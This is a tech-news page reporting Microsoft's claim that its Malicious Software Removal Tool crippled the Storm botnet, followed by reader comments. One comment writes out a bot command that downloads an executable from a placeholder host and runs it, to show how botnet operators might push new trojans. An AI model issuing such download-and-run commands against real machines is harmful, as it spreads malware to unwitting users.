Microsoft: We took out Storm botnet

Its malware scanner cleaned more then 500k PCs infected with the bot in '07

Microsoft today took credit for crushing the Storm botnet, saying that the malware search-and-destroy tool it distributes to Windows users disinfected so many bots that the hackers threw in the towel.

"They realized they were in our gun sights," said Jimmy Kuo, a principal architect with Microsoft's malware protection center, the group responsible for the Malicious Software Removal Tool (MSRT). Microsoft updates and automatically redistributes the software tool to Windows users each month on Patch Tuesday.

Last year, said Kuo, the criminals behind the Storm Trojan -- malware designed to compromise PCs and add them to a botnet, or collection of infected machines -- tried to keep pace with Microsoft and the MSRT. "They were anticipating our monthly release [of MSRT]," said Kuo, "with new versions that were ready to go immediately before our release."

View: Full Article @ Computer World

Report a problem with article
Previous Story

Apple Buys Chip Designer

Next Story

New FolderShare client for Windows available

5 Comments

Commenting is disabled on this article.

No not really.

People with decent anti-virus solutions are unlikely to be part of a botnet. Its the people that sit with no firewall and anti virus that are the key part of botnets but if Automatic Updates push the MASRT and remove offending stuff then it makes things dififcault.

I imagine a botnet is a lot more pointless if it reduces in size by about 70%

(n_K said @ #1)
yeh, or they compressed it using a program like upx or put a different trojan source on the pcs, which isn't very hard (!download http://host/newtrojan.exe C:\runme.exe ~ !run C:\runme.exe)

:rolleyes: And microsofts coding team would have no idea about that would they. MSRT updates are great for the average user, they remove problems they dont even relise they have because of these programs wanting to go updected compared to the old seek and destroy virus types.